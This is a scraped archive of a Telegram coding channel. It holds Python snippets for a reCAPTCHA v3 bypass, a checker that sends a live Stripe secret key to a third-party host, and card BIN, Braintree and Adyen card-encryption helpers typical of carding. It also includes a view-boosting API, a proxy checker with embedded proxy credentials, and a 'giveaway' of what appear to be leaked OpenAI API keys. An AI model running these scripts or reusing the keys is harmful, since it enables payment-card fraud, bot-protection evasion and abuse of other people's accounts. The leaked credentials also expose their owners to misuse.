𝙐𝙣𝙧𝙚𝙖𝙡 𝘾𝙤𝙙𝙚𝙧
رفتن به کانال در Telegram
1 876
مشترکین
اطلاعاتی وجود ندارد24 ساعت
-37 روز
-4230 روز
آرشیو پست ها
1 876
Repost from N/a
Recaptcha V3 Bypass Without Solver
import requests
import random
import json
import re
from urllib.parse import urlparse
from urllib.parse import unquote_plus
class RecapBypass:
def __init__(self, anchor_url:str) -> None:
self.anchor_url = anchor_url
def xform_parser(self, data: str) -> dict:
result = {}
for item in data.split('&'):
key, value = item.split('=', 1)
result[key] = unquote_plus(value)
return result
def captcha_bypass(self, siteKey:str = None):
r1 = requests.get(self.anchor_url).text
x = re.findall(r'id="recaptcha-token"\s*value="(.*?)"', r1)
if not x:
return {"error": "Parse Token Error"}
anchor_data = self.xform_parser(self.anchor_url.split("/anchor?")[1])
if not siteKey:
siteKey = "6Ld48NUZAAAAAGbJ2g2xzdAALwlRF6AwxzjThc4z"
url= f"https://www.google.com/recaptcha/api2/reload?k={siteKey}"
data = {
**anchor_data,
"reason":"q",
"c":x[0],
"chr":"",
"vh":"",
"bg":""
}
r = requests.post(url, data=data)
token = None
try:
token = str(r.text.split('"rresp","')[1].split('"')[0])
except:
return {"error":"Error while parsing response"}
return {"token" : token}1 876
🎀SK lookup api
import requests
s = "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"
url = f"https://sk.voidex.dev/getpk/{s}"
r = requests.get(url)
if r.status_code == 200:
r1 = r.json()
print(r1)
🤩 OUTPUT:
{
"available_balance": -1178,
"country": {
"flag_emoji": "🇮🇳",
"name": "India"
},
"currency": "inr",
"pending_balance": 0,
"pk": "pk_live_51I4OYlLByHilfcg1RgYT7uQFhjPmP6Zuc0q2M6LBDJNGJXLotvD5PCKTqh3WWZsrVUAesWBievr5FY4O3ZZeV3MH00wiOzpeh4",
"sk": "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"
}
🎀Coded by @BiswaX1 876
Simple ChatGPT API
import requests, re
def chatgpt(prompt):
url = "https://aigencycms.polartemplates.com/php/api.php"
data = {
"prompt": prompt,
"ai_id": 2
}
resp = requests.post(url, data=data)
convo = re.findall(r'content":"([^"]+)"', resp.text)
return "".join(convo)
print(chatgpt("write a python code to get even numbers from 1-20"))1 876
🍒Are you stuck with using an old bin API? Then try our API for real-time database functionality.
import requests
url = "https://api.voidex.dev/api/bin"
params = {
"bin": "531462"
}
response = requests.get(url, params=params)
print(response.text)
⚡OUTPUT:
{
"bin": "531462",
"brand": "MASTERCARD",
"country": "US",
"country_name": "UNITED STATES",
"country_flag": "🇺🇸",
"country_currencies": [
"USD",
"USN",
"USS"
],
"bank": "PATHWARD, NATIONAL ASSOCIATION",
"level": "CIRRUS",
"type": "DEBIT",
"bin_api": "Voidex"
}
🎀Coded by @jonasleoz1 876
🤩Braintree Reference Id Generator
import requests
url = "https://api.voidex.dev/api/bref"
params = {
"encodedBearer": "{Your_Braintree_encodedBearer}"
}
response = requests.get(url, params=params)
print(response.text)
🎀Coded by @Roses_are_rosie0071 876
Repost from ⌁ 𝙃𝙮𝙥𝙚𝙧 ⌁
⭐️Happy New Year Special Gift! 🤟
👀 𝘼𝙪𝙩𝙤𝙣𝙤𝙢𝙤𝙪𝙨
🤩 Link: https://autonomous.voidex.dev/
⊙ Session Key:
autonomous-t128rh7-5jvrfie-2ak7gyc
⊙ Validity: 50 Minutes
⊙ Message: Session key has been generated!
Drop feedback 🍕1 876
🤩 TG View api....
import requests
link = "https://api.voidex.dev/api/smm"
params = {"link": "https://t.me/UnrealCoder/88"}
response = requests.get(link, params=params)
print(response.text)
🤩 OUTPUT:
{
"error": "There is already an active order on this link, please wait for the completion of it."
}{
"Order Number": 2,
"Link": "https:\/\/t.me\/UnrealCoder\/88"
}
🎀Coded by @jonasleoz1 876
🤩Proxy Checker
import requests
import json
url = 'https://api.voidex.dev/api/proxy'
data = {
'ip': '163.5.239.131:2154:magical7n4dtyklug:eec2aeNaj1Shah2',
}
json_data = json.dumps(data)
headers = {'Content-Type': 'application/json'}
response = requests.post(url, data=json_data, headers=headers)
print(response.json())
👀 OUTPUT:
{
"status": "LIVE",
"ip": "163.5.239.131",
"proxy": "163.5.239.131:2154:magical7n4dtyklug:eec2aeNaj1Shah2"
}
🎀Coded by @jonasleoz1 876
🤩Ip lookup
import requests
url = "https://api.voidex.dev/api/ipinfo"
params = {
"ip": "1.1.1.1"
}
response = requests.get(url, params=params)
print(response.json())
🎀Coded by @jonasleoz1 876
🤩Adyen Encryption (Latest version)
import requests
pubkey = "10001|977A394C52317DBAF43DF6B9C1CCAAF26E8EB0C9B5E70BED82A352285FA3A6CE30BAC631E71C80B26CF7598FFF01D450F634BC9C88A7FE36D36B1EB56CEDF6F919E679904C46AA1D5CE3DBEA21971E1517E92BF7352648487BF99C87FAE25888C71BF1D185C74E9509FE001F748650EF097530367A55ACF04D8543EEEFBCD13F9B0C4D1D76BC7F6820A4F8B41A348AC37D847703CD84CFC36DFD6027E476548FD53E14F5671CAE87F8BDBE4A11DEE3E8BE920495C1C65637AB274208133A2D52BB73E98D2ABD3BC516FF1BD11B2EE2021FF14B8756C2F0A002866A081CAF9D7D47B2EEB7418C3490B96353383DFACBF70E4A4B5B7B482E67CF8B68885FB66CAF"
card = "4242424242424242|11|2024|111"
def adyen_enc(card:str, pubkey:str):
try:
url= "https://api.voidex.dev/api/ayden"
params = {"card": card, "pubkey": pubkey}
resp = requests.get(url, params=params)
return resp.json()
except Exception as e:
return {"error": str(e)}
print(adyen_enc(card, pubkey))
🎀Coded by @BiswaX1 876
Gemini Pro Chat
https://geminiprochat.com/
Api powered by Gemini Pro (Google’s new generative ai model)
Good for reverse engineering
1 876
CHATGPT 3.5 API KEY
(Giveaway)
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
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
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
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
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
1 876
TimesPrime Code Generator
Required lib:
pip install requests
Note: You may need to use proxy to prevent ip ban!~ Coded By @BiswaX
1 876
Telegram themes.
You may like:
Good for mobile:
https://t.me/addtheme/hyperxd
Good for all OS:
https://t.me/addtheme/darkop
